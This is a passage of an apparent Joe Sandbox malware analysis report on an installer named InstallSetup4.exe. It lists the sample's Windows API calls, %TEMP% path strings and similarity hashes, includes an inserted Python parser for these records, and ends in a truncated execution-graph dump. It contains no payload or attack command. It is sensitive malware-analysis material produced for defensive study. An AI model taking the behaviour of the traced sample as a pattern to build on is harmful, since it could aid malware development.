                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: Free$GlobalLibrary
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1100898210-297319885
                                                                                            • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                            • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                            • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                            • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 00405E78
                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,C:\Users\user\AppData\Local\Temp\InstallSetup4.exe,80000000,00000003), ref: 00405E88
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00405E72
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharPrevlstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 2709904686-3067928993
                                                                                            • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                            • Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
                                                                                            • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                                                                                            • Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                            • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000003.00000002.2242087369.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242134849.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000040A000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.000000000042F000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242153815.0000000000440000.00000004.00000001.01000000.00000007.sdmp
                                                                                             • Associated: 00000003.00000002.2242239936.0000000000445000.00000002.00000001.01000000.00000007.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_InstallSetup4.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 190613189-0
                                                                                            • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                            • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                            • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                            • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
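The function records above follow one fixed layout: an APIs list with call-site refs (indented "Part of subcall" entries for callees), a Strings list with xrefs, the Memory Dump Source lines, and the Similarity identifiers. The Python below is an added example, not Joe Sandbox code, that parses records in that layout into structured data so an analyst can pull out every function that handles the %TEMP% path or match functions across reports by their "API String ID". The sample text is a shortened copy of three records from this listing (Associated lines omitted); the section labels and field names are the report's own, the function names and the hypothetical search needle are mine.

```python
"""Parse Joe Sandbox function records (added example; not Joe Sandbox code).
Section labels and field names are the report's own; function names are mine."""
import re
from collections import defaultdict

# Constructed sample: three records copied (shortened) from the listing above.
SAMPLE = r"""
APIs
• GlobalFree.KERNEL32(006A5820), ref: 00401C10
• GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C22
Memory Dump Source
• Source File: 00000003.00000002.2242105882.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Global$AllocFree
• String ID: Xj$Installed
• API String ID: 3394109436-1323946118
APIs
• IsWindowVisible.USER32(?), ref: 0040557F
• CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
  • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
APIs
• FreeLibrary.KERNEL32(?,76F93420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
• GlobalFree.KERNEL32(00000000), ref: 00403BB5
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-297319885
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<func>[0-9A-Fa-f]+): (?P<rest>.+)$")
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<xrefs>[0-9A-Fa-f, ]+)$")


def parse_function_records(text):
    """One dict per record: apis (name, module, args, ref, subcall_of), strings
    (value, xrefs), source (list-valued, since Associated repeats) and similarity."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":                 # every record opens with APIs
                rec = {"apis": [], "strings": [], "source": {}, "similarity": {}}
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue                           # blank lines and page residue
        item = line[1:].strip()
        if section == "APIs":
            sub = SUBCALL_RE.match(item)       # indented "Part of subcall" entries
            m = API_RE.match(sub.group("rest") if sub else item)
            if m:
                rec["apis"].append({
                    "name": m.group("name"), "module": m.group("module"),
                    "args": m.group("args").split(",") if m.group("args") else [],
                    "ref": m.group("ref"), "subcall_of": sub.group("func") if sub else None})
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                rec["strings"].append({"value": m.group("value"),
                                       "xrefs": m.group("xrefs").split(", ")})
        else:                                  # "Key: value" fields
            key, _, value = item.partition(":")
            if section == "Similarity":
                rec["similarity"][key.strip()] = value.strip()
            else:
                rec["source"].setdefault(key.strip(), []).append(value.strip())
    return records


def index_by_api_string_id(records):
    """Group records by 'API String ID' to match functions across reports."""
    idx = defaultdict(list)
    for rec in records:
        sid = rec["similarity"].get("API String ID")
        if sid:
            idx[sid].append(rec)
    return dict(idx)


def refs_touching(records, needle):
    """Sorted call-site refs of records whose API args or strings contain needle."""
    needle = needle.lower()
    hits = []
    for rec in records:
        blobs = [a for api in rec["apis"] for a in api["args"]]
        blobs += [s["value"] for s in rec["strings"]]
        if any(needle in b.lower() for b in blobs):
            hits.extend(api["ref"] for api in rec["apis"])
    return sorted(hits)


if __name__ == "__main__":
    recs = parse_function_records(SAMPLE)
    print(len(recs), "records; %TEMP% users:", refs_touching(recs, r"\AppData\Local\Temp"))
```

Feed the parser the text of a whole "Function" listing and the index lets you diff two reports of the same family by "API String ID" instead of by fuzzy hash; refs_touching is the quick way to find the call sites that build or clean up paths under the user's Temp directory, which is where InstallSetup4.exe is dropped according to the arguments recorded above.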

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.7%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:1.8%
                                                                                            Total number of Nodes:1703
                                                                                            Total number of Limit Nodes:2
                                                                                             execution_graph: interactive call-graph view (node and edge dump not reproduced). Root node: 7ff69a531140; node addresses are in the 7ff69a53xxxx range (a 64-bit image). API calls named on graph nodes: _amsg_exit, Sleep, _initterm, SetUnhandledExceptionFilter, malloc, strlen, memcpy, _cexit, VirtualProtect, VirtualQuery, GetLastError, wcslen, memset, wcscat, wcscpy, _wcsnicmp, _wcsicmp.
3021 7ff69a531394 2 API calls 3020->3021 3022 7ff69a5315c1 3021->3022 3023 7ff69a531394 2 API calls 3022->3023 3024 7ff69a5315c6 3023->3024 3025 7ff69a531394 2 API calls 3024->3025 3026 7ff69a5315d5 3025->3026 3027 7ff69a531394 2 API calls 3026->3027 3028 7ff69a5315e4 3027->3028 3029 7ff69a531394 2 API calls 3028->3029 3030 7ff69a5315f3 3029->3030 3030->2966 3031 7ff69a531503 3030->3031 3032 7ff69a531394 2 API calls 3031->3032 3033 7ff69a531512 3032->3033 3034 7ff69a531394 2 API calls 3033->3034 3035 7ff69a531521 3034->3035 3036 7ff69a531530 3035->3036 3037 7ff69a531394 2 API calls 3035->3037 3038 7ff69a531394 2 API calls 3036->3038 3037->3036 3039 7ff69a53153a 3038->3039 3040 7ff69a53153f 3039->3040 3041 7ff69a531394 2 API calls 3039->3041 3042 7ff69a531394 2 API calls 3040->3042 3041->3040 3043 7ff69a53154e 3042->3043 3044 7ff69a531394 2 API calls 3043->3044 3045 7ff69a531558 3044->3045 3046 7ff69a53155d 3045->3046 3047 7ff69a531394 2 API calls 3045->3047 3048 7ff69a531394 2 API calls 3046->3048 3047->3046 3049 7ff69a531567 3048->3049 3050 7ff69a53156c 3049->3050 3051 7ff69a531394 2 API calls 3049->3051 3052 7ff69a531394 2 API calls 3050->3052 3051->3050 3053 7ff69a531576 3052->3053 3054 7ff69a53157b 3053->3054 3055 7ff69a531394 2 API calls 3053->3055 3056 7ff69a531394 2 API calls 3054->3056 3055->3054 3057 7ff69a531585 3056->3057 3058 7ff69a53158a 3057->3058 3059 7ff69a531394 2 API calls 3057->3059 3060 7ff69a531394 2 API calls 3058->3060 3059->3058 3061 7ff69a531599 3060->3061 3062 7ff69a531394 2 API calls 3061->3062 3063 7ff69a5315a3 3062->3063 3064 7ff69a5315a8 3063->3064 3065 7ff69a531394 2 API calls 3063->3065 3066 7ff69a531394 2 API calls 3064->3066 3065->3064 3067 7ff69a5315b7 3066->3067 3068 7ff69a531394 2 API calls 3067->3068 3069 7ff69a5315c1 3068->3069 3070 7ff69a531394 2 API calls 3069->3070 3071 7ff69a5315c6 3070->3071 3072 7ff69a531394 2 API calls 3071->3072 3073 7ff69a5315d5 3072->3073 3074 7ff69a531394 2 API calls 3073->3074 3075 7ff69a5315e4 
3074->3075 3076 7ff69a531394 2 API calls 3075->3076 3077 7ff69a5315f3 3076->3077 3077->2824 3078 7ff69a53156c 3077->3078 3079 7ff69a531394 2 API calls 3078->3079 3080 7ff69a531576 3079->3080 3081 7ff69a53157b 3080->3081 3082 7ff69a531394 2 API calls 3080->3082 3083 7ff69a531394 2 API calls 3081->3083 3082->3081 3084 7ff69a531585 3083->3084 3085 7ff69a53158a 3084->3085 3086 7ff69a531394 2 API calls 3084->3086 3087 7ff69a531394 2 API calls 3085->3087 3086->3085 3088 7ff69a531599 3087->3088 3089 7ff69a531394 2 API calls 3088->3089 3090 7ff69a5315a3 3089->3090 3091 7ff69a5315a8 3090->3091 3092 7ff69a531394 2 API calls 3090->3092 3093 7ff69a531394 2 API calls 3091->3093 3092->3091 3094 7ff69a5315b7 3093->3094 3095 7ff69a531394 2 API calls 3094->3095 3096 7ff69a5315c1 3095->3096 3097 7ff69a531394 2 API calls 3096->3097 3098 7ff69a5315c6 3097->3098 3099 7ff69a531394 2 API calls 3098->3099 3100 7ff69a5315d5 3099->3100 3101 7ff69a531394 2 API calls 3100->3101 3102 7ff69a5315e4 3101->3102 3103 7ff69a531394 2 API calls 3102->3103 3104 7ff69a5315f3 3103->3104 3104->2824 3105 7ff69a53145e 3104->3105 3106 7ff69a531394 2 API calls 3105->3106 3107 7ff69a531468 3106->3107 3108 7ff69a53146d 3107->3108 3109 7ff69a531394 2 API calls 3107->3109 3110 7ff69a531394 2 API calls 3108->3110 3109->3108 3111 7ff69a531477 3110->3111 3112 7ff69a53147c 3111->3112 3113 7ff69a531394 2 API calls 3111->3113 3114 7ff69a531394 2 API calls 3112->3114 3113->3112 3115 7ff69a531486 3114->3115 3116 7ff69a53148b 3115->3116 3117 7ff69a531394 2 API calls 3115->3117 3118 7ff69a531394 2 API calls 3116->3118 3117->3116 3119 7ff69a531495 3118->3119 3120 7ff69a53149a 3119->3120 3121 7ff69a531394 2 API calls 3119->3121 3122 7ff69a531394 2 API calls 3120->3122 3121->3120 3123 7ff69a5314a4 3122->3123 3124 7ff69a5314a9 3123->3124 3125 7ff69a531394 2 API calls 3123->3125 3126 7ff69a531394 2 API calls 3124->3126 3125->3124 3127 7ff69a5314b3 3126->3127 3128 7ff69a531394 2 API calls 3127->3128 3129 7ff69a5314b8 3128->3129 
3130 7ff69a531394 2 API calls 3129->3130 3131 7ff69a5314c7 3130->3131 3132 7ff69a531394 2 API calls 3131->3132 3133 7ff69a5314d6 3132->3133 3134 7ff69a531394 2 API calls 3133->3134 3135 7ff69a5314e5 3134->3135 3136 7ff69a531394 2 API calls 3135->3136 3137 7ff69a5314f4 3136->3137 3138 7ff69a531394 2 API calls 3137->3138 3139 7ff69a531503 3138->3139 3140 7ff69a531394 2 API calls 3139->3140 3141 7ff69a531512 3140->3141 3142 7ff69a531394 2 API calls 3141->3142 3143 7ff69a531521 3142->3143 3144 7ff69a531530 3143->3144 3145 7ff69a531394 2 API calls 3143->3145 3146 7ff69a531394 2 API calls 3144->3146 3145->3144 3147 7ff69a53153a 3146->3147 3148 7ff69a53153f 3147->3148 3149 7ff69a531394 2 API calls 3147->3149 3150 7ff69a531394 2 API calls 3148->3150 3149->3148 3151 7ff69a53154e 3150->3151 3152 7ff69a531394 2 API calls 3151->3152 3153 7ff69a531558 3152->3153 3154 7ff69a53155d 3153->3154 3155 7ff69a531394 2 API calls 3153->3155 3156 7ff69a531394 2 API calls 3154->3156 3155->3154 3157 7ff69a531567 3156->3157 3158 7ff69a53156c 3157->3158 3159 7ff69a531394 2 API calls 3157->3159 3160 7ff69a531394 2 API calls 3158->3160 3159->3158 3161 7ff69a531576 3160->3161 3162 7ff69a53157b 3161->3162 3163 7ff69a531394 2 API calls 3161->3163 3164 7ff69a531394 2 API calls 3162->3164 3163->3162 3165 7ff69a531585 3164->3165 3166 7ff69a53158a 3165->3166 3167 7ff69a531394 2 API calls 3165->3167 3168 7ff69a531394 2 API calls 3166->3168 3167->3166 3169 7ff69a531599 3168->3169 3170 7ff69a531394 2 API calls 3169->3170 3171 7ff69a5315a3 3170->3171 3172 7ff69a5315a8 3171->3172 3173 7ff69a531394 2 API calls 3171->3173 3174 7ff69a531394 2 API calls 3172->3174 3173->3172 3175 7ff69a5315b7 3174->3175 3176 7ff69a531394 2 API calls 3175->3176 3177 7ff69a5315c1 3176->3177 3178 7ff69a531394 2 API calls 3177->3178 3179 7ff69a5315c6 3178->3179 3180 7ff69a531394 2 API calls 3179->3180 3181 7ff69a5315d5 3180->3181 3182 7ff69a531394 2 API calls 3181->3182 3183 7ff69a5315e4 3182->3183 3184 7ff69a531394 2 API calls 
3183->3184 3185 7ff69a5315f3 3184->3185 3185->2824 3782 7ff69a532660 3186->3782 3191 7ff69a532e3c 3784 7ff69a532690 3191->3784 3192 7ff69a53145e 2 API calls 3193 7ff69a532f35 3192->3193 3194 7ff69a532f53 3193->3194 3817 7ff69a531512 3193->3817 3196 7ff69a53145e 2 API calls 3194->3196 3197 7ff69a532f5d 3196->3197 3197->2966 3199 7ff69a531394 2 API calls 3198->3199 3200 7ff69a5314e5 3199->3200 3201 7ff69a531394 2 API calls 3200->3201 3202 7ff69a5314f4 3201->3202 3203 7ff69a531394 2 API calls 3202->3203 3204 7ff69a531503 3203->3204 3205 7ff69a531394 2 API calls 3204->3205 3206 7ff69a531512 3205->3206 3207 7ff69a531394 2 API calls 3206->3207 3208 7ff69a531521 3207->3208 3209 7ff69a531530 3208->3209 3210 7ff69a531394 2 API calls 3208->3210 3211 7ff69a531394 2 API calls 3209->3211 3210->3209 3212 7ff69a53153a 3211->3212 3213 7ff69a53153f 3212->3213 3214 7ff69a531394 2 API calls 3212->3214 3215 7ff69a531394 2 API calls 3213->3215 3214->3213 3216 7ff69a53154e 3215->3216 3217 7ff69a531394 2 API calls 3216->3217 3218 7ff69a531558 3217->3218 3219 7ff69a53155d 3218->3219 3220 7ff69a531394 2 API calls 3218->3220 3221 7ff69a531394 2 API calls 3219->3221 3220->3219 3222 7ff69a531567 3221->3222 3223 7ff69a53156c 3222->3223 3224 7ff69a531394 2 API calls 3222->3224 3225 7ff69a531394 2 API calls 3223->3225 3224->3223 3226 7ff69a531576 3225->3226 3227 7ff69a53157b 3226->3227 3228 7ff69a531394 2 API calls 3226->3228 3229 7ff69a531394 2 API calls 3227->3229 3228->3227 3230 7ff69a531585 3229->3230 3231 7ff69a53158a 3230->3231 3232 7ff69a531394 2 API calls 3230->3232 3233 7ff69a531394 2 API calls 3231->3233 3232->3231 3234 7ff69a531599 3233->3234 3235 7ff69a531394 2 API calls 3234->3235 3236 7ff69a5315a3 3235->3236 3237 7ff69a5315a8 3236->3237 3238 7ff69a531394 2 API calls 3236->3238 3239 7ff69a531394 2 API calls 3237->3239 3238->3237 3240 7ff69a5315b7 3239->3240 3241 7ff69a531394 2 API calls 3240->3241 3242 7ff69a5315c1 3241->3242 3243 7ff69a531394 2 API calls 3242->3243 3244 
7ff69a5315c6 3243->3244 3245 7ff69a531394 2 API calls 3244->3245 3246 7ff69a5315d5 3245->3246 3247 7ff69a531394 2 API calls 3246->3247 3248 7ff69a5315e4 3247->3248 3249 7ff69a531394 2 API calls 3248->3249 3250 7ff69a5315f3 3249->3250 3250->2848 3252 7ff69a531394 2 API calls 3251->3252 3253 7ff69a531477 3252->3253 3254 7ff69a53147c 3253->3254 3255 7ff69a531394 2 API calls 3253->3255 3256 7ff69a531394 2 API calls 3254->3256 3255->3254 3257 7ff69a531486 3256->3257 3258 7ff69a53148b 3257->3258 3259 7ff69a531394 2 API calls 3257->3259 3260 7ff69a531394 2 API calls 3258->3260 3259->3258 3261 7ff69a531495 3260->3261 3262 7ff69a53149a 3261->3262 3263 7ff69a531394 2 API calls 3261->3263 3264 7ff69a531394 2 API calls 3262->3264 3263->3262 3265 7ff69a5314a4 3264->3265 3266 7ff69a5314a9 3265->3266 3267 7ff69a531394 2 API calls 3265->3267 3268 7ff69a531394 2 API calls 3266->3268 3267->3266 3269 7ff69a5314b3 3268->3269 3270 7ff69a531394 2 API calls 3269->3270 3271 7ff69a5314b8 3270->3271 3272 7ff69a531394 2 API calls 3271->3272 3273 7ff69a5314c7 3272->3273 3274 7ff69a531394 2 API calls 3273->3274 3275 7ff69a5314d6 3274->3275 3276 7ff69a531394 2 API calls 3275->3276 3277 7ff69a5314e5 3276->3277 3278 7ff69a531394 2 API calls 3277->3278 3279 7ff69a5314f4 3278->3279 3280 7ff69a531394 2 API calls 3279->3280 3281 7ff69a531503 3280->3281 3282 7ff69a531394 2 API calls 3281->3282 3283 7ff69a531512 3282->3283 3284 7ff69a531394 2 API calls 3283->3284 3285 7ff69a531521 3284->3285 3286 7ff69a531530 3285->3286 3287 7ff69a531394 2 API calls 3285->3287 3288 7ff69a531394 2 API calls 3286->3288 3287->3286 3289 7ff69a53153a 3288->3289 3290 7ff69a53153f 3289->3290 3291 7ff69a531394 2 API calls 3289->3291 3292 7ff69a531394 2 API calls 3290->3292 3291->3290 3293 7ff69a53154e 3292->3293 3294 7ff69a531394 2 API calls 3293->3294 3295 7ff69a531558 3294->3295 3296 7ff69a53155d 3295->3296 3297 7ff69a531394 2 API calls 3295->3297 3298 7ff69a531394 2 API calls 3296->3298 3297->3296 3299 7ff69a531567 
3298->3299 3300 7ff69a53156c 3299->3300 3301 7ff69a531394 2 API calls 3299->3301 3302 7ff69a531394 2 API calls 3300->3302 3301->3300 3303 7ff69a531576 3302->3303 3304 7ff69a53157b 3303->3304 3305 7ff69a531394 2 API calls 3303->3305 3306 7ff69a531394 2 API calls 3304->3306 3305->3304 3307 7ff69a531585 3306->3307 3308 7ff69a53158a 3307->3308 3309 7ff69a531394 2 API calls 3307->3309 3310 7ff69a531394 2 API calls 3308->3310 3309->3308 3311 7ff69a531599 3310->3311 3312 7ff69a531394 2 API calls 3311->3312 3313 7ff69a5315a3 3312->3313 3314 7ff69a5315a8 3313->3314 3315 7ff69a531394 2 API calls 3313->3315 3316 7ff69a531394 2 API calls 3314->3316 3315->3314 3317 7ff69a5315b7 3316->3317 3318 7ff69a531394 2 API calls 3317->3318 3319 7ff69a5315c1 3318->3319 3320 7ff69a531394 2 API calls 3319->3320 3321 7ff69a5315c6 3320->3321 3322 7ff69a531394 2 API calls 3321->3322 3323 7ff69a5315d5 3322->3323 3324 7ff69a531394 2 API calls 3323->3324 3325 7ff69a5315e4 3324->3325 3326 7ff69a531394 2 API calls 3325->3326 3327 7ff69a5315f3 3326->3327 3327->2869 3328 7ff69a531404 3327->3328 3329 7ff69a531394 2 API calls 3328->3329 3330 7ff69a531413 3329->3330 3331 7ff69a531422 3330->3331 3332 7ff69a531394 2 API calls 3330->3332 3333 7ff69a531394 2 API calls 3331->3333 3332->3331 3334 7ff69a53142c 3333->3334 3335 7ff69a531431 3334->3335 3336 7ff69a531394 2 API calls 3334->3336 3337 7ff69a531394 2 API calls 3335->3337 3336->3335 3338 7ff69a53143b 3337->3338 3339 7ff69a531440 3338->3339 3340 7ff69a531394 2 API calls 3338->3340 3341 7ff69a531394 2 API calls 3339->3341 3340->3339 3342 7ff69a53144f 3341->3342 3343 7ff69a531394 2 API calls 3342->3343 3344 7ff69a531459 3343->3344 3345 7ff69a53145e 3344->3345 3346 7ff69a531394 2 API calls 3344->3346 3347 7ff69a531394 2 API calls 3345->3347 3346->3345 3348 7ff69a531468 3347->3348 3349 7ff69a53146d 3348->3349 3350 7ff69a531394 2 API calls 3348->3350 3351 7ff69a531394 2 API calls 3349->3351 3350->3349 3352 7ff69a531477 3351->3352 3353 7ff69a53147c 3352->3353 
3354 7ff69a531394 2 API calls 3352->3354 3355 7ff69a531394 2 API calls 3353->3355 3354->3353 3356 7ff69a531486 3355->3356 3357 7ff69a53148b 3356->3357 3358 7ff69a531394 2 API calls 3356->3358 3359 7ff69a531394 2 API calls 3357->3359 3358->3357 3360 7ff69a531495 3359->3360 3361 7ff69a53149a 3360->3361 3362 7ff69a531394 2 API calls 3360->3362 3363 7ff69a531394 2 API calls 3361->3363 3362->3361 3364 7ff69a5314a4 3363->3364 3365 7ff69a5314a9 3364->3365 3366 7ff69a531394 2 API calls 3364->3366 3367 7ff69a531394 2 API calls 3365->3367 3366->3365 3368 7ff69a5314b3 3367->3368 3369 7ff69a531394 2 API calls 3368->3369 3370 7ff69a5314b8 3369->3370 3371 7ff69a531394 2 API calls 3370->3371 3372 7ff69a5314c7 3371->3372 3373 7ff69a531394 2 API calls 3372->3373 3374 7ff69a5314d6 3373->3374 3375 7ff69a531394 2 API calls 3374->3375 3376 7ff69a5314e5 3375->3376 3377 7ff69a531394 2 API calls 3376->3377 3378 7ff69a5314f4 3377->3378 3379 7ff69a531394 2 API calls 3378->3379 3380 7ff69a531503 3379->3380 3381 7ff69a531394 2 API calls 3380->3381 3382 7ff69a531512 3381->3382 3383 7ff69a531394 2 API calls 3382->3383 3384 7ff69a531521 3383->3384 3385 7ff69a531530 3384->3385 3386 7ff69a531394 2 API calls 3384->3386 3387 7ff69a531394 2 API calls 3385->3387 3386->3385 3388 7ff69a53153a 3387->3388 3389 7ff69a53153f 3388->3389 3390 7ff69a531394 2 API calls 3388->3390 3391 7ff69a531394 2 API calls 3389->3391 3390->3389 3392 7ff69a53154e 3391->3392 3393 7ff69a531394 2 API calls 3392->3393 3394 7ff69a531558 3393->3394 3395 7ff69a53155d 3394->3395 3396 7ff69a531394 2 API calls 3394->3396 3397 7ff69a531394 2 API calls 3395->3397 3396->3395 3398 7ff69a531567 3397->3398 3399 7ff69a53156c 3398->3399 3400 7ff69a531394 2 API calls 3398->3400 3401 7ff69a531394 2 API calls 3399->3401 3400->3399 3402 7ff69a531576 3401->3402 3403 7ff69a53157b 3402->3403 3404 7ff69a531394 2 API calls 3402->3404 3405 7ff69a531394 2 API calls 3403->3405 3404->3403 3406 7ff69a531585 3405->3406 3407 7ff69a53158a 3406->3407 3408 
7ff69a531394 2 API calls 3406->3408 3409 7ff69a531394 2 API calls 3407->3409 3408->3407 3410 7ff69a531599 3409->3410 3411 7ff69a531394 2 API calls 3410->3411 3412 7ff69a5315a3 3411->3412 3413 7ff69a5315a8 3412->3413 3414 7ff69a531394 2 API calls 3412->3414 3415 7ff69a531394 2 API calls 3413->3415 3414->3413 3416 7ff69a5315b7 3415->3416 3417 7ff69a531394 2 API calls 3416->3417 3418 7ff69a5315c1 3417->3418 3419 7ff69a531394 2 API calls 3418->3419 3420 7ff69a5315c6 3419->3420 3421 7ff69a531394 2 API calls 3420->3421 3422 7ff69a5315d5 3421->3422 3423 7ff69a531394 2 API calls 3422->3423 3424 7ff69a5315e4 3423->3424 3425 7ff69a531394 2 API calls 3424->3425 3426 7ff69a5315f3 3425->3426 3426->2874 3428 7ff69a531394 2 API calls 3427->3428 3429 7ff69a531585 3428->3429 3430 7ff69a53158a 3429->3430 3431 7ff69a531394 2 API calls 3429->3431 3432 7ff69a531394 2 API calls 3430->3432 3431->3430 3433 7ff69a531599 3432->3433 3434 7ff69a531394 2 API calls 3433->3434 3435 7ff69a5315a3 3434->3435 3436 7ff69a5315a8 3435->3436 3437 7ff69a531394 2 API calls 3435->3437 3438 7ff69a531394 2 API calls 3436->3438 3437->3436 3439 7ff69a5315b7 3438->3439 3440 7ff69a531394 2 API calls 3439->3440 3441 7ff69a5315c1 3440->3441 3442 7ff69a531394 2 API calls 3441->3442 3443 7ff69a5315c6 3442->3443 3444 7ff69a531394 2 API calls 3443->3444 3445 7ff69a5315d5 3444->3445 3446 7ff69a531394 2 API calls 3445->3446 3447 7ff69a5315e4 3446->3447 3448 7ff69a531394 2 API calls 3447->3448 3449 7ff69a5315f3 3448->3449 3449->2880 3450 7ff69a53158a 3449->3450 3451 7ff69a531394 2 API calls 3450->3451 3452 7ff69a531599 3451->3452 3453 7ff69a531394 2 API calls 3452->3453 3454 7ff69a5315a3 3453->3454 3455 7ff69a5315a8 3454->3455 3456 7ff69a531394 2 API calls 3454->3456 3457 7ff69a531394 2 API calls 3455->3457 3456->3455 3458 7ff69a5315b7 3457->3458 3459 7ff69a531394 2 API calls 3458->3459 3460 7ff69a5315c1 3459->3460 3461 7ff69a531394 2 API calls 3460->3461 3462 7ff69a5315c6 3461->3462 3463 7ff69a531394 2 API calls 
